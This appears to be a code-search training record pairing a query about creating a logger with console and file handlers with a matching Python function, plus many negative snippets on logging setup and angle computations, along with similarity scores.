num_theta_bins:]\n else:\n bin_inds = target_angs[..., 0]\n bin_res = target_angs[..., 1:]\n\n # orientation\n bin_size = 2.0 * np.pi / num_theta_bins\n bin_res_i = bin_res.reshape(-1, num_theta_bins)[\n np.arange(bin_inds.size), bin_inds.reshape(-1).astype(np.int64)\n ].reshape(bin_inds.shape)\n # bin_res_i = bin_res[..., 0]\n\n angs = (bin_inds + 0.5) * bin_size + bin_res_i # (-pi, 3*pi)\n angs[angs > np.pi] -= 2.0 * np.pi\n\n return angs", "def h_observer(x, marks):\n estimated_obs_angles = []\n for i in range(0, len(marks)):\n dX = [marks[i][0] - x[0], marks[i][1] - x[1], marks[i][2] - x[2]]\n r = np.sqrt(dX[0]**2 + dX[1]**2 + dX[2]**2)\n theta = np.arccos(dX[2]/r)\n phi = np.arctan2(dX[1], dX[0])\n estimated_obs_angles.extend([theta, phi, r]) if ANGLES_ONLY is False else estimated_obs_angles.extend([theta, phi])\n #print(np.array(estimated_obs_angles))\n return np.array(estimated_obs_angles)", "def _takeoff_angles_taup(taup, greens):\r\n\r\n takeoff_angles = np.zeros(len(greens))\r\n\r\n for _i, greens_tensor in enumerate(greens):\r\n\r\n depth_in_km = greens_tensor.origin.depth_in_m/1000.\r\n distance_in_deg = m_to_deg(greens_tensor.distance_in_m)\r\n\r\n takeoff_angles[_i] = _takeoff_angle_taup(\r\n taup, depth_in_km, distance_in_deg)\r\n\r\n return takeoff_angles", "def V_angles(atoms):\n \n Va = 0 # this is the variable we will store the sum of all the energies in\n N = len(atoms)\n for i in range(len(atoms)):\n j = (i+1) % N\n k = (i-1) % N\n x_ij = atoms.coords[j] - atoms.coords[i] # vector from atom i to j\n x_ik = 
atoms.coords[k] - atoms.coords[i] # vector from atom i to k\n theta = np.arccos(np.dot(x_ij, x_ik)/(norm(x_ij)*norm(x_ik))) # angle between the above two\n \n Va += (theta - TH0)**2\n \n return Va", "def mean_std_angles(angles, interval=(-180,180)):\n # Find the optimal shift to avoid circularity (will fail for large stds)\n opt_shift = find_optimal_angle_window(angles)\n # Calculate the mean and standard deviation with the optimal shift\n ang_mean = numpy.mean(numpy.mod(angles-opt_shift, 360))+opt_shift\n ang_mean = normalise_modular_range(ang_mean, min=interval[0], max=interval[1])\n ang_std = numpy.std(numpy.mod(angles-opt_shift, 360))\n return ang_mean, ang_std", "def execute(self, parameters, messages):\n\n fc = parameters[0].value\n arcpy.CalculatePolygonMainAngle_cartography(fc, \"RotationUTM33\", \"GEOGRAPHIC\")\n\n return", "def deg2rad(a):", "def horizon_angle_to_object(object_info, point):\n object_coords = object_info['axisAlignedBoundingBox']['center'] if 'axisAlignedBoundingBox' in object_info else \\\n object_info['position']\n\n my_height = 1.575\n\n y_delta = object_coords['y'] - my_height\n xz_dist = np.sqrt(np.square(object_coords['x'] - point['x']) + np.square(object_coords['z'] - point['z']))\n r = np.sqrt(np.square(xz_dist) + np.square(y_delta))\n\n angle = np.arctan2(-y_delta / r, xz_dist / r) * 180 / np.pi\n\n if angle < 0:\n angle += 360\n if angle > 360.0:\n angle -= 360.0\n return angle", "def odom_callback(data):\n global x\n global y\n global theta\n x = data.pose.pose.position.x\n y = data.pose.pose.position.y\n rot_q = data.pose.pose.orientation\n (roll, pitch, theta) = euler_from_quaternion([rot_q.x, rot_q.y, rot_q.z, rot_q.w])", "def to_angles(self) -> np.ndarray:\n phi = np.arctan2(2.0*(self.w*self.x + self.y*self.z), 1.0 - 2.0*(self.x**2 + self.y**2))\n theta = np.arcsin(2.0*(self.w*self.y - self.z*self.x))\n psi = np.arctan2(2.0*(self.w*self.z + self.x*self.y), 1.0 - 2.0*(self.y**2 + self.z**2))\n return np.array([phi, theta, psi])", "def circular_mean(angles):\n\n # Convert the angles to cartesian points on the unit circle\n cartesian = np.column_stack((np.cos(angles), np.sin(angles)))\n #breakpoint()\n\n # Find the mean of the cartesian coordinates\n mean_cart = np.mean(cartesian, axis=0)\n\n # Find the angle of the mean point\n mean_angle = np.arctan2(mean_cart[1], mean_cart[0])\n\n # And return it\n return mean_angle" ]
[ "0.56423277", "0.55796504", "0.5485317", "0.532156", "0.5300278", "0.50899595", "0.50719124", "0.50677234", "0.5040855", "0.5008711", "0.5001167", "0.50002366", "0.4993435", "0.49813247", "0.4962279", "0.49208593", "0.49165124", "0.49086887", "0.48858005", "0.48731053", "0.48723224", "0.48558918", "0.48430544", "0.48411146", "0.48357418", "0.4828506", "0.4807861", "0.48014358", "0.4766292", "0.47513896", "0.47353417", "0.4733945", "0.47337496", "0.47316313", "0.47168508", "0.47074506", "0.470537", "0.4702473", "0.4702393", "0.46936724", "0.46921146", "0.46863097", "0.4683394", "0.46803105", "0.4677424", "0.4676402", "0.46656945", "0.46492296", "0.4648502", "0.4632724", "0.46169725", "0.46150485", "0.4603679", "0.459882", "0.4597853", "0.45938855", "0.45930424", "0.45861918", "0.45613223", "0.45543468", "0.45540223", "0.4553873", "0.45525023", "0.45525023", "0.45463517", "0.45424676", "0.45385906", "0.45268166", "0.4526041", "0.45231828", "0.4518904", "0.4513734", "0.45129043", "0.4507501", "0.45073313", "0.45068398", "0.4501346", "0.44978067", "0.44926006", "0.4485177", "0.44832325", "0.44802034", "0.44734493", "0.447338", "0.44701836", "0.44688913", "0.446524", "0.4464126", "0.44506916", "0.44472644", "0.4446752", "0.44446623", "0.44404817", "0.44399285", "0.44270492", "0.44248995", "0.44243932", "0.4412262", "0.43997577", "0.439864" ]
0.7734531
0
Create a logger with console logging (info level) + log file (debug level).
def create_logger(log_dir):
    """Create a logger with console logging (INFO level) + a log file (DEBUG level)."""
    logger = logging.getLogger(__file__)
    # The logger itself must pass DEBUG records, otherwise the file handler never
    # sees them; each handler then filters down to its own level.
    logger.setLevel(logging.DEBUG)
    # file logger (DEBUG level)
    log_filename = "probabilist_connectogram_%s.log" % time.strftime("%Y-%m-%d_%H:%M:%S")
    if log_dir:
        log_path = os.path.join(log_dir, log_filename)
    else:
        log_path = log_filename
    file_handler = logging.FileHandler(log_path)
    formatter = logging.Formatter('%(asctime)s :: %(message)s')
    file_handler.setFormatter(formatter)
    file_handler.setLevel(logging.DEBUG)
    logger.addHandler(file_handler)
    # console logger (INFO level)
    console_handler = logging.StreamHandler()
    console_handler.setLevel(logging.INFO)
    console_handler.setFormatter(formatter)
    logger.addHandler(console_handler)
    logger.info("Log path: %s" % log_path)
    return logger
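A minimal usage sketch for the document above (an illustration only, under stated assumptions: the function's module imports `logging`, `os`, and `time` at the top, and the module name `connectogram` is hypothetical):

from connectogram import create_logger  # hypothetical module name

logger = create_logger("/tmp/logs")  # also emits "Log path: ..." at INFO on creation
logger.debug("reaches the log file only (below the console handler's INFO threshold)")
logger.info("reaches both the console and the log file")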
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_logger():\n logging.basicConfig(level = logging.INFO, filename='logging', filemode='w')\n logger = logging.getLogger(\" \")\n admin_handler = logging.FileHandler('logging')\n admin_handler.setLevel(logging.INFO)\n logger.addHandler(admin_handler)\n logger.warning(f'{admin_handler} created a new logger')\n return logger", "def setup_logger() -> None:\n LOGGER.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(levelname)s \\t|%(asctime)s \\t| %(name)s \\t| %(message)s')\n\n if not check_if_dir_exists(FILENAMES.LOG_DIR):\n os.mkdir(to_abs_file_path(FILENAMES.LOG_DIR))\n\n file_handler: logging.FileHandler = logging.FileHandler(to_abs_file_path(FILENAMES.LOG), mode='w')\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(formatter)\n\n console_handler: logging.StreamHandler = logging.StreamHandler()\n console_handler.setLevel(logging.WARNING)\n\n LOGGER.addHandler(file_handler)\n LOGGER.addHandler(console_handler)\n LOGGER.info('Filehandler and Console_Handler were born, let\\'s start logging')", "def create_logger(name, log_file=None):\n l = logging.getLogger(name)\n formatter = logging.Formatter('[%(asctime)s] %(message)s')\n l.setLevel(logging.DEBUG)\n\n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n sh.setLevel(logging.INFO)\n l.addHandler(sh)\n\n if log_file is not None:\n fh = logging.FileHandler(log_file)\n fh.setFormatter(formatter)\n fh.setLevel(logging.DEBUG)\n l.addHandler(fh)\n\n return l", "def create_logger():\n log = logging.getLogger() # root logger\n log.setLevel(logging.DEBUG)\n format_str = '%(asctime)s - %(levelname)-8s - %(message)s'\n date_format = '%Y-%m-%d %H:%M:%S'\n if os.isatty(2):\n cformat = '%(log_color)s' + format_str\n colors = {'DEBUG': 'reset',\n 'INFO': 'reset',\n 'WARNING': 'bold_yellow',\n 'ERROR': 'bold_red',\n 'CRITICAL': 'bold_red'}\n formatter = colorlog.ColoredFormatter(cformat, date_format,\n log_colors=colors)\n else:\n formatter = logging.Formatter(format_str, date_format)\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(formatter)\n log.addHandler(stream_handler)\n return logging.getLogger(__name__)", "def init_logger():\n logpath = Path(f\"logs/{time.strftime('%Y.%m.%d %H:%M')}.txt\")\n logpath.parent.mkdir(exist_ok=True)\n logging.basicConfig(filename=logpath, level=logging.DEBUG)", "def log_setup(self):\n # Logger initialisation\n logger = logging.getLogger(self.app_name)\n logger.setLevel(logging.DEBUG)\n\n # Creating console handler and set level to debug\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n # Creating formatter\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n\n # Adding formatter to ch\n ch.setFormatter(formatter)\n\n # Adding ch to logger\n logger.addHandler(ch)\n\n # Setting the Logger Level (INFO)\n logger.setLevel(logging.INFO)\n\n return logger", "def setup_logging(\n level,\n console_level,\n file_level,\n):\n global _LOGGING_INITIALIZED\n if _LOGGING_INITIALIZED:\n logging.debug('SetupLogging: logging system already initialized')\n return\n\n program_name = get_program_name()\n logging.addLevelName(LogLevel.DEBUG_VERBOSE, 'DEBUG_VERBOSE')\n logging.addLevelName(LogLevel.ALL, 'ALL')\n\n # Initialize the logging system:\n\n log_formatter = logging.Formatter(\n fmt='%(asctime)s %(levelname)s %(filename)s:%(lineno)s : %(message)s',\n )\n\n log_formatter.formatTime = _format_time\n\n logging.root.handlers.clear()\n logging.root.setLevel(level)\n\n console_handler = logging.StreamHandler()\n 
console_handler.setFormatter(log_formatter)\n console_handler.setLevel(console_level)\n logging.root.addHandler(console_handler)\n\n # Initialize log dir:\n tstamp = timestamp()\n pid = os.getpid()\n\n if FLAGS.log_dir is None:\n tmp_dir = os.path.join('/tmp', getpass.getuser(), program_name)\n make_dir(tmp_dir)\n FLAGS.log_dir = tempfile.mkdtemp(\n prefix='%s.%d.' % (tstamp, pid),\n dir=tmp_dir)\n\n # Link current log dir to latest:\n latest_path = os.path.join(tmp_dir, \"latest\")\n remove(latest_path)\n os.symlink(src=os.path.basename(FLAGS.log_dir), dst=latest_path)\n\n logging.info('Using log dir: %s', FLAGS.log_dir)\n make_dir(FLAGS.log_dir)\n\n log_file = os.path.join(FLAGS.log_dir, '%s.%s.%d.log' % (program_name, tstamp, pid))\n\n # Link current log file to latest.log:\n latest_path = os.path.join(FLAGS.log_dir, \"latest.log\")\n remove(latest_path)\n os.symlink(src=log_file, dst=latest_path)\n\n file_handler = logging.FileHandler(filename=log_file)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(file_level)\n logging.root.addHandler(file_handler)\n\n from base import log\n log.set_logger(log.Logger(level=log.Level.ALL))\n\n _LOGGING_INITIALIZED = True", "def create_logger(job_name, log_file=None, debug=True):\n logging.basicConfig(level=5,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M')\n logging.root.handlers = []\n if debug:\n chosen_level = 5\n else:\n chosen_level = logging.INFO\n logger = logging.getLogger(job_name)\n formatter = logging.Formatter(fmt='%(asctime)s %(message)s',\n datefmt='%m/%d %H:%M:%S')\n if log_file is not None:\n log_dir = osp.dirname(log_file)\n if log_dir:\n if not osp.exists(log_dir):\n os.makedirs(log_dir)\n # cerate file handler\n fh = logging.FileHandler(log_file)\n fh.setLevel(chosen_level)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n # Colored stream handler\n sh = ColorStreamHandler()\n sh.setLevel(chosen_level)\n sh.setFormatter(formatter)\n logger.addHandler(sh)\n return logger", "def get_console_logger(name=__file__, level=logging.INFO):\n sh_formatter = logging.Formatter(\n \"%(asctime)s - %(levelname)s - %(name)s- %(funcName)s -%(lineno)d-\"\n \" %(message)s\"\n )\n logger = logging.getLogger(name)\n logger.setLevel(level)\n sh = logging.StreamHandler()\n sh.setFormatter(sh_formatter)\n logger.addHandler(sh)\n return logger", "def logger(level, log_info):\n log_path = getconfig(\"log\", \"LOG_PATH\")\n log_level = getconfig(\"log\", \"LOG_LEVEL\")\n log_enable = getconfig(\"log\", \"LOG_ENABLE\")\n log_fname = getconfig(\"log\", \"LOG_FNAME\")\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n log_file = os.path.join(log_path, log_fname)\n # base on input string \"DEBUG\",\"ERROR\"... 
get level number\n lvl = l_type_lst.index(level)\n\n # now, begin to write into log file\n log_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n log_pid = os.getpid()\n log_script = sys._getframe().f_back.f_code.co_filename.split('/')[-1]\n log_method = sys._getframe().f_back.f_code.co_name\n log_line = sys._getframe().f_back.f_lineno\n with open(log_file, \"a\") as log:\n if lvl <= int(log_level) and bool(log_enable):\n log.write(\"%s %s %s %s:%s:%s %s\\\n\\n\" % (log_time, log_pid, level, log_script, log_method, log_line, log_info))", "def create_logger(log_file=None, file_=True, console=True,\n with_time=False, file_level=2, console_level=2,\n propagate=False, clear_exist_handlers=False, name=None):\n if file_:\n prefix = strftime('%Y%m%d%H%M%S', localtime(time()))\n if log_file is None:\n log_file = os.path.join(os.path.dirname(__file__), prefix)\n elif with_time:\n log_file = os.path.join(os.path.dirname(log_file), prefix + \"_\" + os.path.basename(log_file))\n\n logger = logging.getLogger(name)\n\n if clear_exist_handlers:\n logger.handlers.clear()\n\n logger.setLevel(levels[1])\n logger.propagate = propagate\n\n formatter = MyFormatter(\"(User) %(asctime)s: %(levelname).1s %(message)s\")\n\n if file_:\n # Create file handler\n file_handler = logging.FileHandler(log_file)\n file_handler.setLevel(levels[file_level])\n file_handler.setFormatter(formatter)\n # Register handler\n logger.addHandler(file_handler)\n\n if console:\n # Create console handler\n console_handler = logging.StreamHandler()\n console_handler.setLevel(levels[console_level])\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n\n return logger", "def _generate_log(path):\n # Create a logger and set the level.\n logger = logging.getLogger(\"Log_info\")\n # Check handler exists\n if len(logger.handlers) > 0:\n return logger # Logger already exists\n # set logger level\n logger.setLevel(logging.DEBUG)\n # Create file handler, log format and add the format to file handler\n stream_handler = logging.StreamHandler()\n file_handler = logging.FileHandler(path)\n\n # See https://docs.python.org/3/library/logging.html#logrecord-attributes\n # for log format attributes.\n log_format = \"%(levelname)s %(asctime)s %(message)s\"\n formatter = logging.Formatter(log_format)\n stream_handler.setFormatter(formatter)\n file_handler.setFormatter(formatter)\n logger.addHandler(stream_handler)\n logger.addHandler(file_handler)\n\n return logger", "def LogInstance(log_file, debug=True):\n logger = logging.getLogger()\n log_formatter = logging.Formatter(\"[%(asctime)s] %(name)s: %(levelname)s: \"\n \"%(message)s\", \"%H:%M:%S\")\n console_formatter = logging.Formatter(\"[%(asctime)s] %(levelname)s: \"\n \"%(message)s\", \"%H:%M:%S\")\n console_log = logging.StreamHandler()\n console_log.setFormatter(console_formatter)\n if debug:\n console_log.setLevel(logging.DEBUG)\n else:\n console_log.setLevel(logging.INFO)\n file_handler = logging.FileHandler(log_file, mode=\"w\")\n file_handler.setFormatter(log_formatter)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(console_log)\n logger.addHandler(file_handler)\n return logger", "def setup_logger(logger: logging.Logger, file_name: str):\n log_fmt = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s')\n # Console Handler\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(log_fmt)\n # File Handler\n fh = RotatingFileHandler(\n filename=f'log/{file_name}.log',\n maxBytes=int(1e6), backupCount=3,\n 
encoding='utf-8', mode='a'\n )\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(log_fmt)\n logger.addHandler(fh)\n logger.addHandler(ch)", "def set_logger(console_level = logging.INFO, file_level = logging.DEBUG, include_file = True, append_file = False):\n\n if not append_file:\n try:\n os.remove(curdir + 'tca2.log')\n except:\n pass\n\n logger = logging.getLogger(curdir + 'tca2')\n logger.setLevel(file_level)\n\n ch = logging.StreamHandler()\n ch.setFormatter(logging.Formatter('%(message)s'))\n ch.setLevel(console_level)\n logger.addHandler(ch)\n\n if include_file:\n fh = logging.FileHandler(curdir + 'tca2.log')\n fh.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\n fh.setLevel(file_level)\n logger.addHandler(fh)\n\n return logger", "def setupLogger():\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)s %(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='prepareToSubmit.log',\n filemode='w')\n # define a Handler which writes INFO messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)", "def setup_logger(filename, write_file=True):\n\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n\n _log = logging.getLogger()\n _log.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter('%(message)s')\n formatter_console = logging.Formatter('%(levelname)s - %(message)s')\n\n if write_file:\n fh = logging.FileHandler(filename, mode='a')\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n _log.addHandler(fh)\n\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(formatter_console)\n _log.addHandler(ch)\n\n return _log", "def get_logger(level=logging.INFO, quite=False, debug=False, to_file=''):\n assert level in [logging.DEBUG, logging.INFO, logging.WARNING, logging.CRITICAL]\n logger = logging.getLogger('main')\n formatter = logging.Formatter('%(asctime)s - %(funcName)s - %(levelname)s - %(message)s')\n if debug:\n level = logging.DEBUG\n logger.setLevel(level=level)\n if not quite:\n if to_file:\n fh = logging.FileHandler(to_file)\n fh.setLevel(level=level)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n else:\n ch = logging.StreamHandler()\n ch.setLevel(level=level)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n return logger", "def create_logger(\n project_name: str,\n level: str = \"INFO\",\n log_dir: str = \"/tmp/logs\",\n file_name: Optional[str] = None,\n do_print: bool = True,\n simple_logging: bool = False,\n log_to_file: bool = False,\n rich_logging: bool = False,\n time_zone: Optional[str] = None,\n):\n import __main__\n\n if file_name is None:\n try:\n file_name = ntpath.basename(__main__.__file__).split(\".\")[0]\n except:\n file_name = \"logs\"\n\n logger = logging.getLogger(file_name)\n logger.handlers.clear()\n logger.setLevel(getattr(logging, level))\n\n if time_zone:\n from pytz import timezone, utc\n def time_formatter(*args):\n # TODO: Doesnt work with rich formatter\n utc_dt = utc.localize(datetime.datetime.utcnow())\n my_tz = timezone(time_zone)\n converted = utc_dt.astimezone(my_tz)\n return converted.timetuple()\n\n logging.Formatter.converter = time_formatter\n\n if rich_logging:\n from rich.logging import 
RichHandler\n stream_format = f\"{project_name}:%(module)s:%(funcName)s: %(message)s\"\n stream_handler = RichHandler(omit_repeated_times=False)\n else:\n stream_format = f\"%(asctime)s:%(levelname)s:{project_name}:%(module)s:%(funcName)s: %(message)s\"\n stream_handler = logging.StreamHandler()\n\n file_formatter = stream_formatter = logging.Formatter(\n stream_format, \"%Y-%m-%d %H:%M:%S\"\n )\n\n if simple_logging:\n file_formatter = logging.Formatter(\"%(message)s\")\n stream_formatter = logging.Formatter(\"%(message)s\")\n\n if log_to_file:\n date = datetime.date.today()\n date = \"%s-%s-%s\" % (date.day, date.month, date.year)\n log_file_path = os.path.join(log_dir, \"%s-%s.log\" % (file_name, date))\n\n create_folder(log_dir)\n file_handler = logging.FileHandler(log_file_path)\n file_handler.setFormatter(file_formatter)\n logger.addHandler(file_handler)\n\n if do_print:\n stream_handler.setFormatter(stream_formatter)\n logger.addHandler(stream_handler)\n\n logger.propagate = False\n\n return logger", "def logger_setup(self, logger_name):\n logger = logging.getLogger(logger_name)\n logger_path = \"/tmp/\" + logger.name\n logger_format = '%(asctime)s %(name)s %(levelname)s %(lineno)d %(message)s'\n\n # set up logging to file\n logging.basicConfig(\n level=logging.INFO,\n format=logger_format,\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=logger_path,\n filemode='w'\n )\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n # set a format which for console use\n formatter = logging.Formatter(logger_format)\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)\n return logger", "def create_logger(**kwargs):\n\n log = logging.getLogger()\n log.setLevel(logging.INFO)\n\n # Create Log Format(s)\n f_format = logging.Formatter('%(asctime)s:%(processName)s:%(name)s:%(levelname)s:%(message)s')\n\n # Create Handlers\n c_handler = logging.StreamHandler()\n c_handler.setLevel(logging.INFO)\n c_handler.setFormatter(f_format)\n log.addHandler(c_handler)\n\n for filename, level in kwargs.items():\n handler = logging.FileHandler(filename=filename)\n handler.setLevel(level)\n handler.setFormatter(f_format)\n log.addHandler(handler)\n\n return log", "def _get_logger(filename='test_install.log'):\n logger = logging.getLogger('test_install.py')\n logger.setLevel(logging.DEBUG)\n\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.INFO)\n\n file_handler = logging.FileHandler(filename)\n file_handler.setLevel(logging.DEBUG)\n\n logger.addHandler(console_handler)\n logger.addHandler(file_handler)\n\n return logger", "def init_log(log_level=logging.DEBUG):\n now = time.time()\n ts = datetime.datetime.fromtimestamp(now).strftime('%Y%m%d')\n file_name = os.path.abspath(os.path.join(os.getcwd(), '..', 'traffic_logs', f'{ts}_traffic.log'))\n folder, _ = os.path.split(file_name)\n Path(folder).mkdir(parents=True, exist_ok=True)\n\n # create formatter and add it to the handlers\n log_format = '[%(asctime)s][%(name)s][%(levelname)s] %(message)s'\n\n logging.basicConfig(filemode='a',\n format=log_format,\n datefmt='%H:%M:%S',\n level=logging.ERROR,\n stream=sys.stdout,\n # filename=file_handler\n )\n\n formatter = logging.Formatter(log_format)\n\n # create file handler which logs even debug messages\n file_handler = logging.FileHandler(file_name)\n file_handler.setFormatter(formatter)\n file_handler.setLevel(log_level)\n\n std_out = logging.StreamHandler(sys.stdout)\n 
std_out.setFormatter(formatter)\n std_out.setLevel(log_level)\n\n # This for avoiding streams to log to root's stderr, which prints in red in jupyter\n root_logger = logging.getLogger()\n for handler in root_logger.handlers:\n # continue\n root_logger.removeHandler(handler)\n\n # add the handlers to the logger\n root_logger.addHandler(file_handler)\n\n # By default the install() function installs a file_handler on the root root_logger,\n # this means that log messages from your code and log messages from the\n # libraries that you use will all show up on the terminal.\n coloredlogs.install(level=log_level, fmt=log_format, stream=sys.stdout)", "def setup_logger(logLevel=\"DEBUG\"):\n logmoduleconsole = logging.getLogger(f\"{__name__}.console\")\n logmoduleconsole.propagate = False\n logmoduleconsole.setLevel(logLevel)\n\n module_console_handler = logging.StreamHandler()\n\n # log_format_module = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n log_format_module = \"%(name)s - %(levelname)s: %(message)s\"\n # log_format_module = '%(levelname)s: %(message)s'\n formatter = logging.Formatter(log_format_module)\n module_console_handler.setFormatter(formatter)\n\n logmoduleconsole.addHandler(module_console_handler)\n\n logging.addLevelName(5, \"TRACE\")\n # use it like this\n # logmoduleconsole.log(5, 'Exceedingly verbose debug')\n\n return logmoduleconsole", "def setLog(path):\n logger = logging.getLogger('current function')\n FORMAT = '%(asctime)s - %(levelname)s - %(message)s'\n logging.basicConfig( level = logging.DEBUG,\n format = FORMAT,\n filename = path,\n filemode = 'wa' )\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n formatter = logging.Formatter(FORMAT)\n console.setFormatter(formatter)\n logger.addHandler(console)\n return logger", "def setup_logger(name, log_file, level=logging.DEBUG):\n\n handler = logging.FileHandler(log_file)\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def open_log(self, log_name='autotest'):\n logger = logging.getLogger(log_name)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(self.console_handler)\n\n self.__logtofile(log_name)\n\n return logger", "def _init_logger(self):\n # Create log directory, if it doesn't already exist.\n self._create_directory(directory=self._log_directory)\n log_filename = \"{0}/{1}.log\".format(self._log_directory, self._program)\n\n # Add the date to the log file names.\n logging.basicConfig(\n filename=log_filename,\n filemode='w',\n level=logging.DEBUG,\n format='%(asctime)s|%(name)s|%(levelname)-5s| %(message)s',\n datefmt='%Y-%m-%d %I:%M:%S %p')\n\n # define a Handler which writes LOG messages or higher to the sys.stderr\n console = logging.StreamHandler()\n #\n # Note: Anything above the logging level is displayed to stdout.\n #\n # Level Numeric value\n # CRITICAL\t50\n # ERROR \t40\n # WARNING\t30\n # LOG 25 (our log level)\n # INFO\t 20\n # DEBUG \t10\n # NOTSET\t0\n #\n # Add a logging level to always display to stderr.\n logging.addLevelName(self._LOG_LEVEL, self._LOG_NAME)\n if self._debug:\n console.setLevel(logging.DEBUG)\n else:\n console.setLevel(self._LOG_LEVEL)\n # Set a format which is simpler for console use.\n formatter = logging.Formatter('%(name)s|%(levelname)-5s| %(message)s')\n console.setFormatter(formatter)\n # Add the handler to the root logger.\n logging.getLogger('').addHandler(console)\n self._logger = logging.getLogger()", "def setup_logger(log_file_path =\"\"):\n 
formatter = ColoredFormatter(\n \"%(log_color)s%(levelname)-8s%(reset)s %(blue)s%(message)s\",\n datefmt=None,\n reset=True,\n log_colors={\n 'DEBUG': 'cyan',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'purple',\n }\n )\n logging.basicConfig(handlers=[logging.FileHandler(log_file_path, 'w', 'utf-8')],\n format=\"%(message)s\"\n )\n logger = logging.getLogger('')\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n\n return logger", "def create_logger(logger_type=1, filename=\"./DMRender.log\",\n console_loglevel=\"INFO\", file_loglevel=\"DEBUG\"):\n if logger_type == 0:\n logger = logging.getLogger('DMlog')\n NullHandler = logging.NullHandler()\n logger.addHandler(NullHandler)\n\n else:\n try:\n numeric_file_loglevel = getattr(logging, file_loglevel.upper())\n numeric_console_loglevel = getattr(\n logging, console_loglevel.upper())\n except AttributeError as e:\n print(\"LoggingError: Invalid logLevel -> {}\".format(e))\n sys.exit(1)\n\n logger = logging.getLogger('DMlog')\n logger.setLevel(logging.DEBUG)\n\n # create console handler which logs to stdout\n if logger_type in [1, 3]:\n consoleLogger = logging.StreamHandler(stream=sys.stdout)\n consoleLogger.setLevel(numeric_console_loglevel)\n if sys.version_info[0] >= 3:\n consoleFormatter = logging.Formatter(\"{name:<5} - {levelname} \\\n - {message}\", style='{')\n else:\n consoleFormatter = logging.Formatter(\"%(name)-5s - \\\n %(levelname)s - %(message)s\")\n consoleLogger.setFormatter(consoleFormatter)\n logger.addHandler(consoleLogger)\n\n # create file handler which logs to a file\n if logger_type in [2, 3]:\n fileLogger = logging.FileHandler(filename, mode='w')\n fileLogger.setLevel(numeric_file_loglevel)\n if sys.version_info[0] >= 3:\n fileFormatter = logging.Formatter(\"{asctime}|{name:<5}|\\\n {levelname:^9} - {message}\", datefmt='%H:%M:%S', style='{')\n else:\n fileFormatter = logging.Formatter(\"%(asctime)s|%(name)-5s|\\\n %(levelname)-9s - %(message)s\", datefmt='%H:%M:%S')\n fileLogger.setFormatter(fileFormatter)\n logger.addHandler(fileLogger)\n\n # Silence the matplotlib logger\n mpl_logger = logging.getLogger(\"matplotlib\")\n mpl_logger.setLevel(logging.WARNING)\n\n return logger", "def file_logger(filename):\n handler = logging.FileHandler(filename)\n formatter = logging.Formatter()\n handler.setFormatter(formatter)\n log = logging.getLogger(filename)\n log.addHandler(handler)\n log.setLevel(logging.DEBUG)\n return log, handler", "def _instanciate_logger(self):\n\t\tself._logger = logging.getLogger('main')\n\t\tself._logger.setLevel(logging.DEBUG)\n\t\tself._logger.addHandler(logging.StreamHandler())", "def getLogger(\n verbose: int = 0,\n filename: Optional[str] = None,\n name: str = \"ttslearn\",\n add_stream_handler: bool = True,\n) -> Logger:\n global _initialized\n logger = logging.getLogger(name)\n if verbose >= 10:\n logger.setLevel(logging.DEBUG)\n elif verbose > 0:\n logger.setLevel(logging.INFO)\n else:\n logger.setLevel(logging.WARN)\n\n if _initialized.get(name, False):\n return logger\n else:\n _initialized[name] = True\n\n if add_stream_handler:\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(logging.Formatter(format))\n logger.addHandler(stream_handler)\n\n if filename is not None:\n Path(filename).parent.mkdir(parents=True, exist_ok=True)\n file_handler = logging.FileHandler(filename=filename)\n file_handler.setLevel(logging.INFO)\n 
